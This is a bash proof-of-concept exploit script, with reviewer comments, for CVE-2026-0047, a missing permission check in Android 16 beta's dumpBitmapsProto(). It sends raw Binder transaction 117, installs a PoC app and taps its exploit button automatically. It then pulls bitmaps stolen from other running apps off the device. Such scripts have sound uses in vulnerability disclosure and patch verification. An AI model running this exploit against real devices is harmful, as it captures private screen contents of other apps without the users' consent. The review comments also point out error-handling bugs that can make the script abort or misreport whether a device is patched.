#!/usr/bin/env bash
# ──────────────────────────────────────────────────────────────────────────────
# CVE-2026-0047 — Single-Shot PoC Exploit Script
#
# Exploits the missing permission check in ActivityManagerService.dumpBitmapsProto()
# on Android 16 QPR2 Beta (Baklava) to steal bitmaps from all running apps.
#
# Prerequisites:
#   - Android SDK with emulator, platform-tools, and build-tools installed
#   - Java 17+
#   - A running Baklava emulator (see setup below) or ADB-connected device
#     with security patch < 2026-03-01
#
# Emulator setup (one-time):
#   sdkmanager "system-images;android-Baklava;google_apis;arm64-v8a"
#   avdmanager create avd -n baklava -k "system-images;android-Baklava;google_apis;arm64-v8a"
#   emulator -avd baklava &
#
# Usage:
#   chmod +x exploit.sh
#   ./exploit.sh                    # build, install, exploit, pull results
#   ./exploit.sh --skip-build       # skip build, just run exploit on device
#   ./exploit.sh --setup-emulator   # create and boot emulator first
#
# Flow: optional emulator setup -> preflight (adb + patch level) -> Phase 1
# (probe the Binder transaction and stop with exit 0 if a SecurityException
# comes back) -> Phase 2 (gradle build) -> Phase 3 (install + UI tap) ->
# Phase 4 (pull results from the app's private files dir into OUTPUT_DIR).
#
# Exit-status notes: the script runs under `set -euo pipefail`, so every
# pipeline below is fatal if ANY stage exits non-zero — including `grep`,
# which exits 1 when it selects no lines. Several pipelines rely on that
# detail; see the NOTE(review) comments next to them.
# ──────────────────────────────────────────────────────────────────────────────

set -euo pipefail

# ANSI colour codes for the log helpers below (interpreted by `echo -e`).
RED='\033[0;31m'
GRN='\033[0;32m'
CYN='\033[0;36m'
YLW='\033[1;33m'
RST='\033[0m'

# Log helpers. Each prints a coloured tag followed by its first argument.
# Note: `echo -e` also interprets backslash escapes inside "$1" itself, and
# all output goes to stdout (diagnostics are not separated onto stderr).
log()  { echo -e "${CYN}[*]${RST} $1"; }
ok()   { echo -e "${GRN}[+]${RST} $1"; }
warn() { echo -e "${YLW}[!]${RST} $1"; }
err()  { echo -e "${RED}[-]${RST} $1"; }
# Print an error and abort the whole script with status 1.
die()  { err "$1"; exit 1; }

# Command-line state. OUTPUT_DIR is RELATIVE to the current working directory;
# see the NOTE(review) in Phase 2 about `cd "$SCRIPT_DIR"` changing that.
SKIP_BUILD=false
SETUP_EMU=false
OUTPUT_DIR="./stolen_bitmaps"

# Only the two boolean flags are accepted; anything else is fatal.
for arg in "$@"; do
  case "$arg" in
    --skip-build)     SKIP_BUILD=true ;;
    --setup-emulator) SETUP_EMU=true ;;
    *) die "Unknown argument: $arg" ;;
  esac
done

# ── Emulator setup ────────────────────────────────────────────────────────────
# Creates (with --force, so an existing AVD of the same name is overwritten)
# and boots an AVD named 'baklava-vuln', then blocks until the guest reports
# sys.boot_completed=1.
if $SETUP_EMU; then
  log "Setting up Baklava emulator..."
  echo ""
  warn "Downloading Android 16 QPR2 Beta system image (~2GB)..."
  sdkmanager "system-images;android-Baklava;google_apis;arm64-v8a" || \
    die "Failed to download system image. Run: sdkmanager --list | grep Baklava"
  log "Creating AVD 'baklava-vuln'..."
  # "no" on stdin answers avdmanager's custom-hardware-profile prompt.
  echo "no" | avdmanager create avd \
    -n baklava-vuln \
    -k "system-images;android-Baklava;google_apis;arm64-v8a" \
    --force
  log "Booting emulator..."
  # Backgrounded; the PID is only reported, never waited on or killed — there
  # is no trap, so the emulator outlives the script on every exit path.
  emulator -avd baklava-vuln -no-snapshot-load -gpu swiftshader_indirect &
  EMU_PID=$!
  log "Waiting for emulator to boot (this takes 1-3 minutes)..."
  adb wait-for-device
  # Poll every 2s. getprop errors are hidden so a not-yet-ready adb shell
  # just yields "" and the loop keeps going.
  # NOTE(review): this is an unbounded loop with no timeout, and it compares
  # the raw output against "1"; if the adb build in use returns CRLF line
  # endings the value would be "1\r" and the loop would never end (the later
  # phases strip '\r' explicitly) — confirm against the adb version in use.
  while [ "$(adb shell getprop sys.boot_completed 2>/dev/null)" != "1" ]; do
    sleep 2
  done
  ok "Emulator booted (PID $EMU_PID)"
  echo ""
fi

# ── Preflight checks ──────────────────────────────────────────────────────────
log "Checking prerequisites..."
command -v adb >/dev/null 2>&1 || die "adb not found. Install Android SDK platform-tools."
adb get-state >/dev/null 2>&1 || die "No device connected. Boot an emulator first: sdkmanager 'system-images;android-Baklava;google_apis;arm64-v8a' avdmanager create avd -n baklava -k 'system-images;android-Baklava;google_apis;arm64-v8a' emulator -avd baklava &"
# Build fingerprint used for the patch-level gate and the final report.
# stderr is suppressed, so a failed getprop leaves the variable empty rather
# than aborting.
PATCH_LEVEL=$(adb shell getprop ro.build.version.security_patch 2>/dev/null)
BUILD=$(adb shell getprop ro.build.display.id 2>/dev/null)
SDK=$(adb shell getprop ro.build.version.sdk 2>/dev/null)
echo ""
echo " Device: $(adb shell getprop ro.product.model)"
echo " Build: $BUILD"
echo " SDK: $SDK"
echo " Patch level: $PATCH_LEVEL"
echo ""
# Patch-level gate. `>` inside [[ ]] is a LEXICAL string comparison, which
# works here only because the patch level is an ISO date (YYYY-MM-DD). The
# second clause is redundant: any "2025-..." string already sorts below
# "2026-02-28". An empty PATCH_LEVEL (getprop failed) silently skips the
# warning. This is advisory only — the script continues either way.
if [[ "$PATCH_LEVEL" > "2026-02-28" ]] && [[ "$PATCH_LEVEL" != "2025"* ]]; then
  warn "Patch level $PATCH_LEVEL >= 2026-03-01 — device may be patched."
  warn "The exploit will still run but expect SecurityException."
  echo ""
fi

# No hidden_api_policy needed — raw Binder transact bypasses hidden API entirely
echo ""

# ── Phase 1: Raw Binder probe ─────────────────────────────────────────────────
# Sends transaction code 117 to the "activity" service with no arguments and
# classifies the response text. A SecurityException / permission denial is
# treated as "patched" and ends the script with exit 0. The transaction
# number is hard-coded; it is only meaningful for the specific build this
# PoC targets.
log "Phase 1: Raw Binder transaction probe..."
log "Sending transaction #117 (dumpBitmapsProto) to IActivityManager..."
echo ""
# NOTE(review): under `set -e` this assignment is fatal if `adb shell`
# returns a non-zero status (which it does when the remote command fails on
# recent adb/device versions). In that case the script aborts here and the
# "PATCHED" branch below never runs, so a patched device may be reported as
# a script crash rather than as patched. Appending `|| true` to the
# substitution would let the response text be inspected as intended.
PROBE=$(adb shell "service call activity 117" 2>&1)
if echo "$PROBE" | grep -qi "SecurityException\|Permission.Denial"; then
  err "PATCHED: SecurityException returned."
  err "This device enforces DUMP permission on dumpBitmapsProto()."
  echo ""
  echo "$PROBE"
  exit 0
fi
# Any of these substrings means the call was dispatched to the method body;
# "fffffffc" is treated as a Binder-level error that still lacks a
# SecurityException. Anything else falls through to Phase 2 with a warning.
if echo "$PROBE" | grep -qi "dumpBitmapsProto\|ActivityManagerService\|NullPointerException"; then
  ok "METHOD REACHED — no SecurityException!"
  ok "CVE-2026-0047 confirmed: dumpBitmapsProto() has no permission check."
elif echo "$PROBE" | grep -q "fffffffc"; then
  ok "Binder returned error code but NO SecurityException."
  ok "Method was dispatched without permission check."
else
  warn "Unexpected response. Continuing with Phase 2..."
fi
echo ""

# ── Phase 2: Build the PoC app ────────────────────────────────────────────────
# SCRIPT_DIR resolves to the directory containing this script (via cd/pwd, so
# it is absolute even when invoked through a relative path).
SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
APK_PATH="$SCRIPT_DIR/app/build/outputs/apk/debug/app-debug.apk"
if ! $SKIP_BUILD; then
  if [ -f "$SCRIPT_DIR/gradlew" ]; then
    log "Phase 2: Building PoC APK..."
    # NOTE(review): this `cd` changes the working directory for the rest of
    # the script, so the relative OUTPUT_DIR ("./stolen_bitmaps") ends up under
    # SCRIPT_DIR on a build run but under the invoker's cwd with --skip-build.
    # Resolving OUTPUT_DIR to an absolute path before this point would make
    # the two modes agree.
    cd "$SCRIPT_DIR"
    chmod +x gradlew
    # With pipefail a gradle failure still aborts the script even though only
    # the last three lines of its output are shown.
    ./gradlew :app:assembleDebug -q 2>&1 | tail -3
    ok "APK built: $APK_PATH"
  else
    die "gradlew not found in $SCRIPT_DIR. Run from the PoC project root."
  fi
else
  log "Phase 2: Skipping build (--skip-build)"
  [ -f "$APK_PATH" ] || die "APK not found at $APK_PATH. Run without --skip-build first."
fi
echo ""

# ── Phase 3: Install and exploit ──────────────────────────────────────────────
log "Phase 3: Installing PoC app..."
# NOTE(review): `grep -v "^$"` exits 1 when every line it sees is blank, and
# under pipefail that fails the whole pipeline and aborts the script even
# though the install succeeded. `|| true` on the pipeline (or dropping the
# blank-line filter) avoids the false abort; the install's own failure is
# still caught through pipefail.
adb install -r "$APK_PATH" 2>&1 | grep -v "^$"
ok "Installed com.poc.cve20260047"
echo ""
# The Settings app is launched first so that a foreground process with UI
# bitmaps exists; `am start` failures are hidden and the fixed 2s sleeps are
# the only synchronisation.
log "Opening Settings app (target with visible UI bitmaps)..."
adb shell am start -n com.android.settings/.Settings >/dev/null 2>&1
sleep 2
log "Launching PoC exploit..."
adb shell am start -n com.poc.cve20260047/.MainActivity >/dev/null 2>&1
sleep 2
# Find the exploit button and tap it
log "Triggering dumpBitmapsProto() exploit via UI..."
# Dump the view hierarchy and pull the `bounds="[x1,y1][x2,y2]"` attribute of
# the node whose resource-id is com.poc.cve20260047:id/btnRealCve. The
# trailing `|| true` keeps a non-match (grep exit 1) from aborting the script,
# leaving BOUNDS empty instead.
adb shell uiautomator dump /sdcard/poc_ui.xml >/dev/null 2>&1
BOUNDS=$(adb shell cat /sdcard/poc_ui.xml 2>/dev/null | \
  grep -o 'resource-id="com.poc.cve20260047:id/btnRealCve"[^>]*' | \
  grep -o 'bounds="\[[0-9]*,[0-9]*\]\[[0-9]*,[0-9]*\]"' | \
  grep -o '\[.*\]' || true)
if [ -n "$BOUNDS" ]; then
  # BOUNDS is "[x1,y1][x2,y2]"; each sed picks out one of the four numbers.
  X1=$(echo "$BOUNDS" | sed 's/\[\([0-9]*\),.*/\1/')
  Y1=$(echo "$BOUNDS" | sed 's/\[[0-9]*,\([0-9]*\)\].*/\1/')
  X2=$(echo "$BOUNDS" | sed 's/.*\[\([0-9]*\),.*/\1/')
  Y2=$(echo "$BOUNDS" | sed 's/.*\[[0-9]*,\([0-9]*\)\]/\1/')
  # Tap the centre of the button's bounding box.
  TX=$(( (X1 + X2) / 2 ))
  TY=$(( (Y1 + Y2) / 2 ))
  adb shell input tap "$TX" "$TY"
  ok "Tapped exploit button at ($TX, $TY)"
else
  # Fallback coordinates are a fixed guess that depends on screen size and
  # layout; nothing verifies that the tap landed on the button.
  warn "Could not find button via uiautomator, trying default coordinates..."
  adb shell input tap 540 736
fi
# Fixed wait; there is no completion signal from the app, so a slow device
# simply yields "No bitmap files found" in Phase 4.
log "Waiting for exploit to complete (up to 20 seconds)..."
sleep 20
echo ""

# ── Phase 4: Extract results ──────────────────────────────────────────────────
# Reads the PoC app's private files dir through `run-as` (which works only
# because the app is a debuggable build), counts stolen_bitmap_* entries and
# reads the size of stolen_bitmaps.bin. Both commands degrade to "0" on
# failure: `grep -c` prints 0 and exits 1 (hence `|| true`), and a failed
# stat is replaced by `echo "0"`.
log "Phase 4: Extracting stolen bitmaps..."
mkdir -p "$OUTPUT_DIR"
FILE_COUNT=$(adb shell "run-as com.poc.cve20260047 ls files/ 2>/dev/null" | grep -c "stolen_bitmap_" || true)
BIN_SIZE=$(adb shell "run-as com.poc.cve20260047 stat -c%s files/stolen_bitmaps.bin 2>/dev/null" || echo "0")
# `2>/dev/null` on the test hides the "integer expression expected" error if
# FILE_COUNT is not numeric (e.g. contains a stray '\r'); that case is then
# treated as zero files.
if [ "$FILE_COUNT" -gt 0 ] 2>/dev/null; then
  ok "Found $FILE_COUNT stolen PNG files on device!"
  echo ""
  # Unquoted $(...) word-splits the listing into names; the '\r' is stripped
  # per name afterwards, which is safe because '\r' is not in IFS. Each file
  # is streamed out through `cat` because the pull goes via run-as, not
  # `adb pull`.
  for f in $(adb shell "run-as com.poc.cve20260047 ls files/" 2>/dev/null | grep "stolen_bitmap_.*\.png"); do
    f=$(echo "$f" | tr -d '\r')
    adb shell "run-as com.poc.cve20260047 cat files/$f" > "$OUTPUT_DIR/$f" 2>/dev/null
  done
  adb shell "run-as com.poc.cve20260047 cat files/stolen_bitmaps.bin" > "$OUTPUT_DIR/raw_protobuf.bin" 2>/dev/null
  # Count how many pulled files `file` recognises as PNG. Inside the `if`
  # condition pipefail/-e do not abort, so a missing `file` binary just
  # leaves VALID at 0. Without nullglob an unmatched pattern is passed to
  # `file` literally and likewise counts as not valid.
  VALID=0
  for png in "$OUTPUT_DIR"/stolen_bitmap_*.png; do
    if file "$png" 2>/dev/null | grep -q "PNG image"; then
      VALID=$((VALID + 1))
    fi
  done
  echo ""
  echo " ══════════════════════════════════════════"
  echo " CVE-2026-0047 EXPLOIT RESULTS"
  echo " ══════════════════════════════════════════"
  echo ""
  echo " Device: $(adb shell getprop ro.product.model)"
  echo " Build: $BUILD"
  echo " Patch level: $PATCH_LEVEL"
  echo ""
  echo " Raw protobuf: $BIN_SIZE bytes"
  echo " PNG files: $FILE_COUNT extracted"
  echo " Valid PNGs: $VALID confirmed"
  echo " Output dir: $OUTPUT_DIR/"
  echo ""
  echo " Permissions used: NONE"
  echo ""
  echo " ══════════════════════════════════════════"
  echo ""
  ok "Stolen bitmaps saved to $OUTPUT_DIR/"
  log "View them with: open $OUTPUT_DIR/ (macOS) or xdg-open $OUTPUT_DIR/ (Linux)"
  echo ""
  # NOTE(review): if every per-file `cat` above failed, the glob matches
  # nothing, `ls` exits non-zero and pipefail makes this the script's exit
  # status — the final `echo` is skipped. Harmless, but worth a `|| true`.
  ls -lhS "$OUTPUT_DIR"/stolen_bitmap_*.png 2>/dev/null | head -10
  echo ""
else
  warn "No bitmap files found. Checking logcat for exploit status..."
  echo ""
  # NOTE(review): `grep -i` exits 1 when logcat contains none of these
  # strings; with pipefail + set -e the script then aborts right here and the
  # screenshot below is never taken — exactly in the diagnostic case where it
  # is most wanted. Appending `|| true` to this pipeline fixes that.
  adb logcat -d | grep -i "CVE-PoC\|dumpBitmap\|SecurityException" | tail -20
  echo ""
  # Take screenshot of result
  adb shell screencap -p /sdcard/poc_result.png 2>/dev/null
  adb pull /sdcard/poc_result.png "$OUTPUT_DIR/exploit_screenshot.png" 2>/dev/null
  log "Screenshot saved to $OUTPUT_DIR/exploit_screenshot.png"
fi